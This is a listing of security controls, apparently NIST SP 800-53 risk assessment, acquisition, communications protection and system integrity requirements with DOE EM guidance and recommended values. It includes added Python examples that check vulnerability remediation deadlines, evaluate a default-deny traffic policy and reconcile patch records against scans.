RA-1 a - Risk Assessment Policy and Procedures
The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: A risk assessment policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
Recommended value: Security Staff and Administrative Staff
RA-1 a - Risk Assessment Policy and Procedures
The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the risk assessment policy and associated risk assessment controls; and
Recommended value: Security Staff and Administrative Staff
RA-1 b - Risk Assessment Policy and Procedures
The organization: Reviews and updates the current: Risk assessment policy [Assignment: organization-defined frequency]; and
Recommended value: Annually or any time there is a major change
RA-1 b - Risk Assessment Policy and Procedures
The organization: Reviews and updates the current: Risk assessment procedures [Assignment: organization-defined frequency].
Recommended value: Annually or any time there is a major change
RA-2 a - Security Categorization
The organization: Categorizes information and the information system in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance;
RA-2 b - Security Categorization
The organization: Documents the security categorization results (including supporting rationale) in the security plan for the information system; and
RA-2 c - Security Categorization
The organization: Ensures the security categorization decision is reviewed and approved by the authorizing official or authorizing official designated representative.
RA-3 a - Risk Assessment
The organization: Conducts an assessment of risk, including the likelihood and magnitude of harm, from the unauthorized access, use, disclosure, disruption, modification, or destruction of the information system and the information it processes, stores, or transmits;
RA-3 b - Risk Assessment
The organization: Documents risk assessment results in [Selection: security plan; risk assessment report; [Assignment: organization-defined document]];
Recommended value: A risk assessment report or security assessment report
RA-3 c - Risk Assessment
The organization: Reviews risk assessment results [Assignment: organization-defined frequency]; and
Recommended value: Annually or any time there is a major change
RA-3 d - Risk Assessment
The organization: Disseminates risk assessment results to [Assignment: organization-defined personnel or roles]; and
RA-3 e - Risk Assessment
The organization: Updates the risk assessment [Assignment: organization-defined frequency] or whenever there are significant changes to the information system or environment of operation (including the identification of new threats and vulnerabilities), or other conditions that may impact the security state of the system.
RA-5 a - Vulnerability Scanning
The organization: Scans for vulnerabilities in the information system and hosted applications [Assignment: organization-defined frequency and/or randomly in accordance with organization-defined process] and when new vulnerabilities potentially affecting the system/applications are identified and reported;
Recommended value: Quarterly
RA-5 b 1 - Vulnerability Scanning
The organization: Employs vulnerability scanning tools and techniques that promote interoperability among tools and automate parts of the vulnerability management process by using standards for: Enumerating platforms, software flaws, and improper configurations;
RA-5 b 2 - Vulnerability Scanning
The organization: Employs vulnerability scanning tools and techniques that promote interoperability among tools and automate parts of the vulnerability management process by using standards for: Formatting and making transparent, checklists and test procedures; and
RA-5 b 3 - Vulnerability Scanning
The organization: Employs vulnerability scanning tools and techniques that promote interoperability among tools and automate parts of the vulnerability management process by using standards for: Measuring vulnerability impact;
RA-5 c - Vulnerability Scanning
The organization: Analyzes vulnerability scan reports and results from security control assessments;
RA-5 d - Vulnerability Scanning
The organization: Remediates legitimate vulnerabilities [Assignment: organization-defined response times] in accordance with an organizational assessment of risk; and
Recommended value: Within 60 days for high and 30 days for critical vulnerabilities
RA-5 e - Vulnerability Scanning
The organization: Shares information obtained from the vulnerability scanning process and security control assessments with designated personnel throughout the organization to help eliminate similar vulnerabilities in other information systems (i.e., systemic weaknesses or deficiencies).
RA-5 1 - Vulnerability Scanning
The organization employs vulnerability scanning tools that include the capability to readily update the list of information system vulnerabilities scanned.
RA-5 2 - Vulnerability Scanning
The organization updates the information system vulnerabilities scanned [Selection (one or more): [Assignment: organization-defined frequency]; prior to a new scan; when new vulnerabilities are identified and reported].
RA-5 5 - Vulnerability Scanning
The information system implements privileged access authorization to [Assignment: organization-identified information system components] for selected [Assignment: organization-defined vulnerability scanning activities].
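As an added worked example, not part of the RMAIP or of any EM tooling: a Python check that applies the RA-5 d recommended response times (30 days for critical, 60 days for high) to scan findings and reports the misses, and that tests the RA-5 a quarterly cadence against an assumed 91-day gap. The finding ids, hosts and dates are constructed sample values; severities without a recommended value on this page (medium, low) get no deadline and are left to the organizational risk assessment the control refers to.

```python
"""RA-5 d remediation-deadline check over constructed scan findings (example only)."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

# Recommended response times from the RA-5 d row, in days from first detection.
SLA_DAYS = {"critical": 30, "high": 60}


@dataclass(frozen=True)
class Finding:
    finding_id: str                     # scanner-assigned id (constructed below)
    host: str
    severity: str                       # "critical", "high", "medium", "low"
    first_detected: date                # date the scanner first reported it
    remediated: Optional[date] = None   # None while the finding is still open


def due_date(finding: Finding) -> Optional[date]:
    """Remediation deadline, or None when the page sets no response time for this severity."""
    days = SLA_DAYS.get(finding.severity.lower())
    return None if days is None else finding.first_detected + timedelta(days=days)


def days_overdue(finding: Finding, as_of: date) -> int:
    """Days past the deadline; 0 when on time, without a deadline, or closed in time.

    A finding closed after its deadline is measured at its remediation date, so a
    historical report still shows the breach instead of hiding it once closed.
    """
    deadline = due_date(finding)
    if deadline is None:
        return 0
    end = finding.remediated if finding.remediated is not None else as_of
    return max(0, (end - deadline).days)


def overdue_report(findings, as_of: date):
    """(finding_id, host, severity, days_overdue) for every SLA miss, worst first."""
    rows = []
    for f in findings:
        late = days_overdue(f, as_of)
        if late > 0:
            rows.append((f.finding_id, f.host, f.severity, late))
    rows.sort(key=lambda r: r[3], reverse=True)
    return rows


def scan_cadence_ok(last_scan: date, as_of: date, max_gap_days: int = 91) -> bool:
    """RA-5 a recommends quarterly scans; 91 days is this example's reading of a quarter."""
    return (as_of - last_scan).days <= max_gap_days


# Constructed sample data, not real scan output.
AS_OF = date(2024, 3, 1)
LAST_SCAN = date(2023, 12, 15)
SAMPLE_FINDINGS = [
    Finding("F-1001", "web01", "critical", date(2024, 1, 2)),                                 # open, past 30-day SLA
    Finding("F-1002", "web01", "high", date(2024, 1, 2)),                                     # open, 60-day SLA not yet reached
    Finding("F-1003", "db01", "critical", date(2024, 1, 10), remediated=date(2024, 2, 20)),   # closed, but late
    Finding("F-1004", "db01", "medium", date(2023, 6, 1)),                                    # no page-defined deadline
    Finding("F-1005", "app02", "high", date(2024, 2, 15)),                                    # open, within SLA
]

if __name__ == "__main__":
    for row in overdue_report(SAMPLE_FINDINGS, AS_OF):
        print("OVERDUE %s on %s (%s): %d days past deadline" % row)
    print("scan cadence OK:", scan_cadence_ok(LAST_SCAN, AS_OF))
```

Feeding real scanner exports into `Finding` is the only integration step; the deadline logic stays the same, and the "closed late" case is the one most dashboards lose once a ticket is resolved.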
SA-1 0 a 1 - System Services Acquisition Policy and Procedures
The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: A system and services acquisition policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
Recommended value: Security Staff and Administrative Staff
SA-1 0 a 2 - System Services Acquisition Policy and Procedures
The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the system and services acquisition policy and associated system and services acquisition controls; and
Recommended value: Security Staff and Administrative Staff
SA-1 0 b 1 - System Services Acquisition Policy and Procedures
The organization: Reviews and updates the current: System and services acquisition policy [Assignment: organization-defined frequency]; and
Recommended value: Annually or any time there is a major change
SA-1 0 b 2 - System Services Acquisition Policy and Procedures
The organization: Reviews and updates the current: System and services acquisition procedures [Assignment: organization-defined frequency].
Recommended value: Annually or any time there is a major change
SA-2 0 a - Allocation of Resources
The organization: Determines information security requirements for the information system or information system service in mission/business process planning;
SA-2 0 b - Allocation of Resources
The organization: Determines, documents, and allocates the resources required to protect the information system or information system service as part of its capital planning and investment control process; and
SA-2 0 c - Allocation of Resources
The organization: Establishes a discrete line item for information security in organizational programming and budgeting documentation.
SA-3 0 a - System Development Life Cycle
The organization: Manages the information system using [Assignment: organization-defined system development life cycle] that incorporates information security considerations;
SA-3 0 b - System Development Life Cycle
The organization: Defines and documents information security roles and responsibilities throughout the system development life cycle;
SA-3 0 c - System Development Life Cycle
The organization: Identifies individuals having information security roles and responsibilities; and
SA-3 0 d - System Development Life Cycle
The organization: Integrates the organizational information security risk management process into system development life cycle activities.
SA-4 0 a - Acquisition Process
The organization includes the following requirements, descriptions, and criteria, explicitly or by reference, in the acquisition contract for the information system, system component, or information system service in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, guidelines, and organizational mission/business needs: Security functional requirements;
SA-4 0 b - Acquisition Process
Security strength requirements;
SA-4 0 c - Acquisition Process
Security assurance requirements;
SA-4 0 d - Acquisition Process
Security-related documentation requirements;
SA-4 0 e - Acquisition Process
Requirements for protecting security-related documentation;
SA-4 0 f - Acquisition Process
Description of the information system development environment and environment in which the system is intended to operate; and
SA-4 0 g - Acquisition Process
Acceptance criteria.
SA-4 1 - Acquisition Process
The organization requires the developer of the information system, system component, or information system service to provide a description of the functional properties of the security controls to be employed.
SA-4 2 - Acquisition Process
The organization requires the developer of the information system, system component, or information system service to provide design and implementation information for the security controls to be employed that includes: [Selection (one or more): security-relevant external system interfaces; high-level design; low-level design; source code or hardware schematics; [Assignment: organization-defined design/implementation information]] at [Assignment: organization-defined level of detail].
SA-4 9 - Acquisition Process
The organization requires the developer of the information system, system component, or information system service to identify early in the system development life cycle, the functions, ports, protocols, and services intended for organizational use.
SA-4 10 - Acquisition Process
The organization employs only information technology products on the FIPS 201-approved products list for Personal Identity Verification (PIV) capability implemented within organizational information systems.
SA-5 0 a 1 - Information System Documentation
The organization: Obtains administrator documentation for the information system, system component, or information system service that describes: Secure configuration, installation, and operation of the system, component, or service;
SA-5 0 a 2 - Information System Documentation
The organization: Obtains administrator documentation for the information system, system component, or information system service that describes: Effective use and maintenance of security functions/mechanisms; and
SA-5 0 a 3 - Information System Documentation
The organization: Obtains administrator documentation for the information system, system component, or information system service that describes: Known vulnerabilities regarding configuration and use of administrative (i.e., privileged) functions;
SA-5 0 b 1 - Information System Documentation
The organization: Obtains user documentation for the information system, system component, or information system service that describes: User-accessible security functions/mechanisms and how to effectively use those security functions/mechanisms;
SA-5 0 b 2 - Information System Documentation
The organization: Obtains user documentation for the information system, system component, or information system service that describes: Methods for user interaction, which enables individuals to use the system, component, or service in a more secure manner; and
SA-5 0 b 3 - Information System Documentation
The organization: Obtains user documentation for the information system, system component, or information system service that describes: User responsibilities in maintaining the security of the system, component, or service;
SA-5 0 c - Information System Documentation
The organization: Documents attempts to obtain information system, system component, or information system service documentation when such documentation is either unavailable or nonexistent and [Assignment: organization-defined actions] in response;
SA-5 0 d - Information System Documentation
The organization: Protects documentation as required, in accordance with the risk management strategy; and
SA-5 0 e - Information System Documentation
The organization: Distributes documentation to [Assignment: organization-defined personnel or roles].
SA-8 0 - Security Engineering Principles
The organization applies information system security engineering principles in the specification, design, development, implementation, and modification of the information system.
SA-9 0 a - External Information System Services
The organization: Requires that providers of external information system services comply with organizational information security requirements and employ [Assignment: organization-defined security controls] in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance;
EM Supplemental Guidance: An external information system service is a service that is implemented outside of the authorization boundary of the organizational information system. The responsibility for adequately mitigating risks arising from the use of external information system services remains with the authorizing official.
SA-9 0 b - External Information System Services
The organization: Defines and documents government oversight and user roles and responsibilities with regard to external information system services; and
SA-9 0 c - External Information System Services
The organization: Employs [Assignment: organization-defined processes, methods, and techniques] to monitor security control compliance by external service providers on an ongoing basis.
SA-9 2 - External Information System Services
The organization requires providers of [Assignment: organization-defined external information system services] to identify the functions, ports, protocols, and other services required for the use of such services.
SA-10 0 a - Developer Configuration Management
The organization requires the developer of the information system, system component, or information system service to: Perform configuration management during system, component, or service [Selection (one or more): design; development; implementation; operation];
SA-10 0 b - Developer Configuration Management
The organization requires the developer of the information system, system component, or information system service to: Document, manage, and control the integrity of changes to [Assignment: organization-defined configuration items under configuration management];
SA-10 0 c - Developer Configuration Management
The organization requires the developer of the information system, system component, or information system service to: Implement only organization-approved changes to the system, component, or service;
SA-10 0 d - Developer Configuration Management
The organization requires the developer of the information system, system component, or information system service to: Document approved changes to the system, component, or service and the potential security impacts of such changes; and
SA-10 0 e - Developer Configuration Management
The organization requires the developer of the information system, system component, or information system service to: Track security flaws and flaw resolution within the system, component, or service and report findings to [Assignment: organization-defined personnel].
SA-11 0 a - Developer Security Testing and Evaluation
The organization requires the developer of the information system, system component, or information system service to: Create and implement a security assessment plan;
SA-11 0 b - Developer Security Testing and Evaluation
The organization requires the developer of the information system, system component, or information system service to: Perform [Selection (one or more): unit; integration; system; regression] testing/evaluation at [Assignment: organization-defined depth and coverage];
SA-11 0 c - Developer Security Testing and Evaluation
The organization requires the developer of the information system, system component, or information system service to: Produce evidence of the execution of the security assessment plan and the results of the security testing/evaluation;
SA-11 0 d - Developer Security Testing and Evaluation
The organization requires the developer of the information system, system component, or information system service to: Implement a verifiable flaw remediation process; and
SA-11 0 e - Developer Security Testing and Evaluation
The organization requires the developer of the information system, system component, or information system service to: Correct flaws identified during security testing/evaluation.
SC-1 a 1 - System Communications Policy and Procedures
The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: A system and communications protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
Recommended value: Security Staff and Administrative Staff
SC-1 a 2 - System Communications Policy and Procedures
The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the system and communications protection policy and associated system and communications protection controls; and
Recommended value: Security Staff and Administrative Staff
SC-1 b 1 - System Communications Policy and Procedures
The organization: Reviews and updates the current: System and communications protection policy [Assignment: organization-defined frequency]; and
Recommended value: Annually or any time there is a major change
SC-1 b 2 - System Communications Policy and Procedures
The organization: Reviews and updates the current: System and communications protection procedures [Assignment: organization-defined frequency].
Recommended value: Annually or any time there is a major change
SC-2 - Application Partitioning
The information system separates user functionality (including user interface services) from information system management functionality.
EM Supplemental Guidance: The separation of user functionality from information system management functionality is either physical or logical and is accomplished by using different computers, different central processing units, different instances of the operating system, different network addresses, combinations of these methods, or other methods as appropriate.
SC-4 - Information in Shared Resources
The information system prevents unauthorized and unintended information transfer via shared system resources.
EM Supplemental Guidance: The purpose of this control is to prevent information, including encrypted representations of information, produced by the actions of a prior user/role (or the actions of a process acting on behalf of a prior user/role) from being available to any current user/role (or current process) that obtains access to a shared system resource (e.g., registers, main memory, secondary storage) after that resource has been released back to the information system.
SC-5 - Denial of Service Protection
The information system protects against or limits the effects of the following types of denial of service attacks: [Assignment: organization-defined types of denial of service attacks or reference to source for such information] by employing [Assignment: organization-defined security safeguards].
Recommended value: ICMP flood, Teardrop attack, Peer-to-peer attacks, Permanent denial-of-service attacks, Application level floods, Nuke, Distributed attack, Reflected attack, and Unintentional attack
EM Supplemental Guidance: A variety of technologies exist to limit, or in some cases, eliminate the effects of denial of service attacks. For example, boundary protection devices can filter certain types of packets to protect devices on an organization's internal network from being directly affected by denial of service attacks.
SC-7(a) Boundary Protection
  NIST control requirement: The information system: Monitors and controls communications at the external boundary of the system and at key internal boundaries within the system; and
  EM supplemental guidance: Restricting external web traffic only to organizational web servers within managed interfaces and prohibiting external traffic that appears to be spoofing an internal address as the source are examples of restricting and prohibiting communications. Managed interfaces employing boundary protection devices include, for example, proxies, gateways, routers, firewalls, guards, or encrypted tunnels arranged in an effective security architecture (e.g., routers protecting firewalls and application gateways residing on a protected subnetwork commonly referred to as a demilitarized zone or DMZ). The EM enterprise full packet capture satisfies part of this requirement.

SC-7(b) Boundary Protection
  NIST control requirement: The information system: Implements subnetworks for publicly accessible system components that are [Selection: physically; logically] separated from internal organizational networks; and

SC-7(c) Boundary Protection
  NIST control requirement: The information system: Connects to external networks or information systems only through managed interfaces consisting of boundary protection devices arranged in accordance with an organizational security architecture.

SC-7(3) Boundary Protection
  NIST control requirement: The organization limits the number of external network connections to the information system.
SC-7(4)(a) Boundary Protection
  NIST control requirement: The organization: Implements a managed interface for each external telecommunication service;

SC-7(4)(b) Boundary Protection
  NIST control requirement: The organization: Establishes a traffic flow policy for each managed interface;

SC-7(4)(c) Boundary Protection
  NIST control requirement: The organization: Protects the confidentiality and integrity of the information being transmitted across each interface;

SC-7(4)(d) Boundary Protection
  NIST control requirement: The organization: Documents each exception to the traffic flow policy with a supporting mission/business need and duration of that need;

SC-7(4)(e) Boundary Protection
  NIST control requirement: The organization: Reviews exceptions to the traffic flow policy [Assignment: organization-defined frequency] and removes exceptions that are no longer supported by an explicit mission/business need.
  Recommended organization-defined value: Annually

SC-7(5) Boundary Protection
  NIST control requirement: The information system at managed interfaces denies network traffic by default and allows network traffic by exception (i.e., deny all, permit by exception).
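The SC-7(4)(d)/(e) and SC-7(5) requirements above describe one mechanism: a default-deny traffic flow policy whose only permits are documented exceptions with a stated need and an end date, reviewed periodically. The following is an added example written for this page, not code from the RMAIP or any EM site, that models that policy as an evaluator. It also applies the SC-7(a) guidance on dropping external traffic that spoofs an internal source. The policy entries, addresses (RFC 5737 documentation ranges) and dates are constructed.

```python
"""Deny-all, permit-by-exception traffic flow policy with documented, expiring exceptions.

Added example (not part of the DOE EM RMAIP). Addresses, names and dates are constructed.
"""
from dataclasses import dataclass
from datetime import date
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class FlowException:
    """One documented exception to the default-deny policy (SC-7(4)(d))."""
    name: str
    src: str        # CIDR of permitted sources
    dst: str        # CIDR of permitted destinations
    proto: str      # "tcp" or "udp"
    port: int       # destination port
    need: str       # supporting mission/business need
    expires: date   # duration of that need

    def matches(self, src, dst, proto, port):
        return (ip_address(src) in ip_network(self.src)
                and ip_address(dst) in ip_network(self.dst)
                and proto == self.proto and port == self.port)


# Internal address space (assumption: RFC 1918 ranges).
INTERNAL = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]


def decide(exceptions, src, dst, proto, port, today, from_external=True):
    """Return (verdict, reason) for one flow seen at a managed interface.

    Order matters: anti-spoofing first (an external packet claiming an internal
    source is dropped even if an exception would otherwise match), then the
    exception list, then the SC-7(5) default deny."""
    if from_external and any(ip_address(src) in net for net in INTERNAL):
        return "deny", "external traffic spoofing an internal source address"
    for ex in exceptions:
        if ex.matches(src, dst, proto, port):
            if today > ex.expires:
                return "deny", f"exception {ex.name} expired {ex.expires.isoformat()}"
            return "permit", f"exception {ex.name}: {ex.need}"
    return "deny", "no matching exception (deny all, permit by exception)"


def review(exceptions, today):
    """The SC-7(4)(e) review: names of exceptions no longer supported by a documented need."""
    return [ex.name for ex in exceptions if today > ex.expires]


# Constructed sample policy.
POLICY = [
    FlowException("web-dmz", "0.0.0.0/0", "203.0.113.0/24", "tcp", 443,
                  "public web servers in the DMZ", date(2030, 12, 31)),
    FlowException("vendor-sftp", "198.51.100.7/32", "10.0.5.20/32", "tcp", 22,
                  "contract data exchange with vendor", date(2014, 6, 30)),
]
REVIEW_DATE = date(2015, 1, 1)     # constructed date of the annual review
BEFORE_EXPIRY = date(2014, 1, 1)   # constructed date while the vendor exception was still valid

if __name__ == "__main__":
    for flow in [("198.51.100.9", "203.0.113.5", "tcp", 443),
                 ("198.51.100.7", "10.0.5.20", "tcp", 22),
                 ("10.0.9.9", "203.0.113.5", "tcp", 443),
                 ("198.51.100.9", "10.0.5.20", "tcp", 3389)]:
        print(flow, decide(POLICY, *flow, REVIEW_DATE))
    print("remove at review:", review(POLICY, REVIEW_DATE))
```

In production the same policy is expressed as firewall rules; the value of writing it out this way is that the exception record carries the justification and expiry the control asks for, so the annual review is a query rather than an interview.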
SC-7(7) Boundary Protection
  NIST control requirement: The information system, in conjunction with a remote device, prevents the device from simultaneously establishing non-remote connections with the system and communicating via some other connection to resources in external networks.
  EM supplemental guidance: This control enhancement is implemented within the remote device (e.g., notebook/laptop computer) via configuration settings that are not configurable by the user of that device. An example of a non-remote communications path from a remote device is a virtual private network. When a non-remote connection is established using a virtual private network, the configuration settings prevent split-tunneling.

SC-8 Transmission Integrity and Confidentiality
  NIST control requirement: The information system protects the [Selection (one or more): confidentiality; integrity] of transmitted information.
  EM supplemental guidance: This control applies to communications across internal and external networks.

SC-8(1) Transmission Integrity and Confidentiality
  NIST control requirement: The information system implements cryptographic mechanisms to [Selection (one or more): prevent unauthorized disclosure of information; detect changes to information] during transmission unless otherwise protected by [Assignment: organization-defined alternative physical safeguards].

SC-10 Network Disconnect
  NIST control requirement: The information system terminates the network connection associated with a communications session at the end of the session or after [Assignment: organization-defined time period] of inactivity.
  Recommended organization-defined value: 30 minutes of inactivity
  EM supplemental guidance: This control applies to both internal and external networks. Terminating network connections associated with communications sessions includes, for example, de-allocating associated TCP/IP address/port pairs at the operating-system level, or de-allocating networking assignments at the application level if multiple application sessions are using a single, operating system-level network connection.
SC-12 Cryptographic Key Establishment and Management
  NIST control requirement: The organization establishes and manages cryptographic keys for required cryptography employed within the information system in accordance with [Assignment: organization-defined requirements for key generation, distribution, storage, access, and destruction].

SC-13 Use of Cryptography
  NIST control requirement: The information system implements [Assignment: organization-defined cryptographic uses and type of cryptography required for each use] in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards.

SC-15(a) Collaborative Computing Devices
  NIST control requirement: The information system: Prohibits remote activation of collaborative computing devices with the following exceptions: [Assignment: organization-defined exceptions where remote activation is to be allowed]; and
  Recommended organization-defined value: None
  EM supplemental guidance: Collaborative computing devices include, for example, networked VTCs, whiteboards, cameras, and microphones. Explicit indication of use includes, for example, signals to users when collaborative computing devices are activated.

SC-15(b) Collaborative Computing Devices
  NIST control requirement: The information system: Provides an explicit indication of use to users physically present at the devices.

SC-17 Public Key Infrastructure Certificates
  NIST control requirement: The organization issues public key certificates under an [Assignment: organization-defined certificate policy] or obtains public key certificates from an approved service provider.

SC-18(a) Mobile Code
  NIST control requirement: The organization: Defines acceptable and unacceptable mobile code and mobile code technologies;
SC-18(b) Mobile Code
  NIST control requirement: The organization: Establishes usage restrictions and implementation guidance for acceptable mobile code and mobile code technologies; and

SC-18(c) Mobile Code
  NIST control requirement: The organization: Authorizes, monitors, and controls the use of mobile code within the information system.

SC-19(a) Voice Over Internet Protocol
  NIST control requirement: The organization: Establishes usage restrictions and implementation guidance for Voice over Internet Protocol (VoIP) technologies based on the potential to cause damage to the information system if used maliciously; and

SC-19(b) Voice Over Internet Protocol
  NIST control requirement: The organization: Authorizes, monitors, and controls the use of VoIP within the information system.

SC-20(a) Secure Name/Address Resolution Service (Authoritative Source)
  NIST control requirement: The information system: Provides additional data origin and integrity artifacts along with the authoritative name resolution data the system returns in response to external name/address resolution queries; and
  EM supplemental guidance: This control enables remote clients to obtain origin authentication and integrity verification assurances for the host/service name to network address resolution information obtained through the service. A domain name system (DNS) server is an example of an information system that provides name/address resolution service. Digital signatures and cryptographic keys are examples of additional artifacts.
SC-20(b) Secure Name/Address Resolution Service (Authoritative Source)
  NIST control requirement: The information system: Provides the means to indicate the security status of child zones and (if the child supports secure resolution services) to enable verification of a chain of trust among parent and child domains, when operating as part of a distributed, hierarchical namespace.

SC-21 Secure Name/Address Resolution Service (Recursive or Caching Resolver)
  NIST control requirement: The information system requests and performs data origin authentication and data integrity verification on the name/address resolution responses the system receives from authoritative sources.

SC-22 Architecture and Provisioning for Name/Address Resolution Service
  NIST control requirement: The information systems that collectively provide name/address resolution service for an organization are fault-tolerant and implement internal/external role separation.
  EM supplemental guidance: A domain name system (DNS) server is an example of an information system that provides name/address resolution service. To eliminate single points of failure and to enhance redundancy, there are typically at least two authoritative domain name system (DNS) servers, one configured as primary and the other as secondary.

SC-23 Session Authenticity
  NIST control requirement: The information system provides mechanisms to protect the authenticity of communications sessions.
  EM supplemental guidance: This control focuses on communications protection at the session, versus packet, level. The intent of this control is to establish grounds for confidence at each end of a communications session in the ongoing identity of the other party and in the validity of the information being transmitted.
SC-28 Protection of Information at Rest
  NIST control requirement: The information system protects the [Selection (one or more): confidentiality; integrity] of [Assignment: organization-defined information at rest].
  EM supplemental guidance: This control is intended to address the confidentiality and integrity of information at rest in nonmobile devices and covers user information and system information.

SC-39 Process Isolation
  NIST control requirement: The information system maintains a separate execution domain for each executing process.

SI-1(a)(1) System and Information Integrity Policy and Procedures
  NIST control requirement: The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: A system and information integrity policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
  Recommended organization-defined value: Security Staff and Administrative Staff

SI-1(a)(2) System and Information Integrity Policy and Procedures
  NIST control requirement: The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the system and information integrity policy and associated system and information integrity controls; and
  Recommended organization-defined value: Security Staff and Administrative Staff

SI-1(b)(1) System and Information Integrity Policy and Procedures
  NIST control requirement: The organization: Reviews and updates the current: System and information integrity policy [Assignment: organization-defined frequency]; and
  Recommended organization-defined value: Annually or any time there is a major change

SI-1(b)(2) System and Information Integrity Policy and Procedures
  NIST control requirement: The organization: Reviews and updates the current: System and information integrity procedures [Assignment: organization-defined frequency].
  Recommended organization-defined value: Annually or any time there is a major change
SI-2(a) Flaw Remediation
  NIST control requirement: The organization: Identifies, reports, and corrects information system flaws;

SI-2(b) Flaw Remediation
  NIST control requirement: The organization: Tests software and firmware updates related to flaw remediation for effectiveness and potential side effects before installation;

SI-2(c) Flaw Remediation
  NIST control requirement: The organization: Installs security-relevant software and firmware updates within [Assignment: organization-defined time period] of the release of the updates; and
  Recommended organization-defined value: 5 days for critical updates and 10 days for high and moderate.
  EM supplemental guidance: Vulnerability scans should be run shortly after patching to ensure all patches were implemented successfully. All exceptions should be investigated.

SI-2(d) Flaw Remediation
  NIST control requirement: The organization: Incorporates flaw remediation into the organizational configuration management process.

SI-2(2) Flaw Remediation
  NIST control requirement: The organization employs automated mechanisms [Assignment: organization-defined frequency] to determine the state of information system components with regard to flaw remediation.
  Recommended organization-defined value: Weekly
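The SI-2(c) window and the guidance that a scan follow patching together define a reconciliation step: what the deployment tool says it installed, what the scanner still sees, and whether anything not yet installed is past its window. The following is an added example written for this page, not RMAIP or EM site code, that performs that reconciliation over constructed records. The 5/10-day windows are the page's recommended values; the 30-day window for "low" is an assumption, since the page gives none, as are the host names, patch identifiers and dates.

```python
"""Reconcile patch deployment records against a post-patch vulnerability scan.

Added example (not part of the DOE EM RMAIP). Hosts, patch IDs and dates are constructed.
"""
from datetime import date, timedelta

# SI-2(c) recommended values: 5 days critical, 10 days high and moderate.
# "low" is an assumption; the page leaves it undefined.
WINDOW_DAYS = {"critical": 5, "high": 10, "moderate": 10, "low": 30}


def due_date(severity, released):
    """Latest acceptable install date for an update of the given severity."""
    return released + timedelta(days=WINDOW_DAYS[severity.lower()])


def reconcile(deployed, findings, scan_date):
    """Compare what the patch system reports installed with what the scanner still detects.

    deployed: set of (host, patch_id) the deployment tool reports as installed.
    findings: dicts {host, patch_id, severity, released} still detected by the scan.
    Returns sorted lists of (host, patch_id):
      failed  - reported installed but still detected: the exceptions to investigate
      overdue - not installed and past the SI-2(c) window
      pending - not installed but still inside the window
    """
    failed, overdue, pending = [], [], []
    for f in findings:
        key = (f["host"], f["patch_id"])
        if key in deployed:
            failed.append(key)
        elif scan_date > due_date(f["severity"], f["released"]):
            overdue.append(key)
        else:
            pending.append(key)
    return {"failed": sorted(failed), "overdue": sorted(overdue), "pending": sorted(pending)}


# Constructed sample: deployment records plus a scan run a week after release.
DEPLOYED = {("srv-01", "PATCH-1001"), ("srv-02", "PATCH-1001"), ("srv-02", "PATCH-1002")}
FINDINGS = [
    {"host": "srv-02", "patch_id": "PATCH-1001", "severity": "critical", "released": date(2014, 3, 1)},
    {"host": "srv-03", "patch_id": "PATCH-1001", "severity": "critical", "released": date(2014, 3, 1)},
    {"host": "srv-03", "patch_id": "PATCH-1002", "severity": "high", "released": date(2014, 3, 1)},
    {"host": "srv-03", "patch_id": "PATCH-1003", "severity": "moderate", "released": date(2014, 3, 5)},
]
SCAN_DATE = date(2014, 3, 8)

if __name__ == "__main__":
    for bucket, keys in reconcile(DEPLOYED, FINDINGS, SCAN_DATE).items():
        print(bucket, keys)
```

The "failed" bucket is the one the guidance calls out: a patch the tool reports as installed but the scanner still finds means a reboot was skipped, the install was rolled back, or the scanner and the tool disagree about what fixed the flaw, and each case needs a person to look.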
SI-3(a) Malicious Code Protection
  NIST control requirement: The organization: Employs malicious code protection mechanisms at information system entry and exit points to detect and eradicate malicious code;
  EM supplemental guidance: The EM enterprise full packet capture is part of the EM sites' malicious code protection.

SI-3(b) Malicious Code Protection
  NIST control requirement: The organization: Updates malicious code protection mechanisms whenever new releases are available in accordance with organizational configuration management policy and procedures;
SI-3(c)(1) Malicious Code Protection
  NIST control requirement: The organization: Configures malicious code protection mechanisms to: Perform periodic scans of the information system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry/exit points] as the files are downloaded, opened, or executed in accordance with organizational security policy; and
  Recommended organization-defined value: Daily

SI-3(c)(2) Malicious Code Protection
  NIST control requirement: The organization: Configures malicious code protection mechanisms to: [Selection (one or more): block malicious code; quarantine malicious code; send alert to administrator; [Assignment: organization-defined action]] in response to malicious code detection; and
  Recommended organization-defined value: Block/quarantine malicious code, then send an alert to the administrators

SI-3(d) Malicious Code Protection
  NIST control requirement: The organization: Addresses the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the information system.

SI-3(1) Malicious Code Protection
  NIST control requirement: The organization centrally manages malicious code protection mechanisms.

SI-3(2) Malicious Code Protection
  NIST control requirement: The information system automatically updates malicious code protection mechanisms.
SI-4(a)(1) Information System Monitoring
  NIST control requirement: The organization: Monitors the information system to detect: Attacks and indicators of potential attacks in accordance with [Assignment: organization-defined monitoring objectives]; and
  Recommended organization-defined value: Network monitoring and incident identification section of the incident response plan
  EM supplemental guidance: Information system monitoring includes external and internal monitoring. External monitoring includes the observation of events occurring at the system boundary (i.e., part of perimeter defense and boundary protection). Internal monitoring includes the observation of events occurring within the system (e.g., within internal organizational networks and system components).

